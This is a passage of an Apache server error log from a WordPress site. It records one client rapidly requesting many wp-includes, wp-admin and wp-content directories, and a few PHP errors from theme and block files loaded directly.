(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:53.355104 2024] [autoindex:error] [pid 29534:tid 139643985258240] [client 143.198.203.58:38654] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:53.592926 2024] [autoindex:error] [pid 28891:tid 139643968472832] [client 143.198.203.58:38656] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:55.160896 2024] [autoindex:error] [pid 28890:tid 139643960080128] [client 143.198.203.58:38662] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:55.398354 2024] [autoindex:error] [pid 28890:tid 139643722843904] [client 143.198.203.58:38666] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/random_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:55.889720 2024] [autoindex:error] [pid 29534:tid 139643873912576] [client 143.198.203.58:38668] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:56.139076 2024] [autoindex:error] [pid 28891:tid 139643748022016] [client 143.198.203.58:38670] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:56.389031 2024] [autoindex:error] [pid 28891:tid 139643781592832] [client 143.198.203.58:38672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:56.638228 2024] [autoindex:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:38676] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:56.889281 2024] [autoindex:error] [pid 28889:tid 139643857127168] [client 143.198.203.58:38678] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:57.138473 2024] [autoindex:error] [pid 28890:tid 139643781592832] [client 143.198.203.58:38680] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:57.388301 2024] [autoindex:error] [pid 28889:tid 139643882305280] [client 143.198.203.58:38682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:39:57.637704 2024] [autoindex:error] [pid 28890:tid 139643739629312] [client 143.198.203.58:38684] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:01.084530 2024] [autoindex:error] [pid 29534:tid 139643882305280] [client 143.198.203.58:38694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:01.578876 2024] [autoindex:error] [pid 29534:tid 139643756414720] [client 143.198.203.58:38698] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:01.822997 2024] [autoindex:error] [pid 28891:tid 139643865519872] [client 143.198.203.58:38700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:08.992733 2024] [autoindex:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:38726] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/utils/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:09.261893 2024] [autoindex:error] [pid 29534:tid 139643764807424] [client 143.198.203.58:38730] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:09.519561 2024] [autoindex:error] [pid 29534:tid 139643815163648] [client 143.198.203.58:38732] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:09.767687 2024] [autoindex:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:38734] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:10.017879 2024] [autoindex:error] [pid 28890:tid 139643840341760] [client 143.198.203.58:38736] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:10.300480 2024] [autoindex:error] [pid 29534:tid 139643739629312] [client 143.198.203.58:38740] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:10.563420 2024] [autoindex:error] [pid 29534:tid 139643798378240] [client 143.198.203.58:38742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:12.168980 2024] [autoindex:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:38748] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:12.414824 2024] [autoindex:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:38750] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:12.661822 2024] [autoindex:error] [pid 28890:tid 139643806770944] [client 143.198.203.58:38752] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:12.907288 2024] [autoindex:error] [pid 28890:tid 139643865519872] [client 143.198.203.58:38754] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-directory/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:16.137452 2024] [autoindex:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:38766] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:20.748761 2024] [autoindex:error] [pid 29534:tid 139643739629312] [client 143.198.203.58:38782] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwentytwo/inc/patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:20.992157 2024] [autoindex:error] [pid 28889:tid 139643748022016] [client 143.198.203.58:38784] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentynineteen/inc/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:23.079511 2024] [:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:38790] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php:17 [Fri Aug 16 23:40:23.079608 2024] [:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:38790] Stack trace: [Fri Aug 16 23:40:23.079622 2024] [:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:38790] #0 {main} [Fri Aug 16 23:40:23.079709 2024] [:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:38790] thrown in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php on line 17 [Fri Aug 16 23:40:41.417097 2024] [autoindex:error] [pid 29534:tid 139643773200128] [client 143.198.203.58:38842] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:40:47.740166 2024] [authz_core:error] [pid 28891:tid 139643789985536] [client 143.198.203.58:38866] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/ [Fri Aug 16 23:41:29.654743 2024] [autoindex:error] [pid 28890:tid 139643798378240] [client 143.198.203.58:38980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:29.896813 2024] [autoindex:error] [pid 28890:tid 139643857127168] [client 143.198.203.58:38982] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:30.138550 2024] [autoindex:error] [pid 28889:tid 139643739629312] [client 143.198.203.58:38984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:30.380276 2024] [autoindex:error] [pid 28891:tid 139643960080128] [client 143.198.203.58:38986] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:30.622582 2024] [autoindex:error] [pid 28891:tid 139643882305280] [client 143.198.203.58:38988] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:30.866044 2024] [autoindex:error] [pid 29534:tid 139643764807424] [client 143.198.203.58:38992] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/nux/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:31.110357 2024] [autoindex:error] [pid 29534:tid 139643722843904] [client 143.198.203.58:38994] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:31.354508 2024] [autoindex:error] [pid 29534:tid 139643731236608] [client 143.198.203.58:38996] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:34.795829 2024] [autoindex:error] [pid 28890:tid 139643968472832] [client 143.198.203.58:39008] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:35.038523 2024] [autoindex:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:39010] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:35.282195 2024] [autoindex:error] [pid 28891:tid 139643873912576] [client 143.198.203.58:39012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:35.525521 2024] [autoindex:error] [pid 28889:tid 139643722843904] [client 143.198.203.58:39014] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:35.771304 2024] [autoindex:error] [pid 28891:tid 139643764807424] [client 143.198.203.58:39018] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:36.014335 2024] [autoindex:error] [pid 29534:tid 139643960080128] [client 143.198.203.58:39020] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:36.257525 2024] [autoindex:error] [pid 29534:tid 139643781592832] [client 143.198.203.58:39022] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:36.501609 2024] [autoindex:error] [pid 29534:tid 139643985258240] [client 143.198.203.58:39024] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:36.853208 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39030] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Aug 16 23:41:36.853601 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39030] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Aug 16 23:41:36.853900 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39030] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Aug 16 23:41:36.854157 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39030] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Aug 16 23:41:37.108407 2024] [autoindex:error] [pid 28890:tid 139643781592832] [client 143.198.203.58:39036] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:37.351849 2024] [autoindex:error] [pid 28889:tid 139643993650944] [client 143.198.203.58:39038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:39.212164 2024] [autoindex:error] [pid 29534:tid 139643731236608] [client 143.198.203.58:39046] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:39.692505 2024] [autoindex:error] [pid 28890:tid 139643739629312] [client 143.198.203.58:39048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:41.356258 2024] [autoindex:error] [pid 28890:tid 139643976865536] [client 143.198.203.58:39054] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:43.055060 2024] [autoindex:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:39060] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:50.555649 2024] [autoindex:error] [pid 28890:tid 139643806770944] [client 143.198.203.58:39084] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:52.410535 2024] [autoindex:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:39090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex 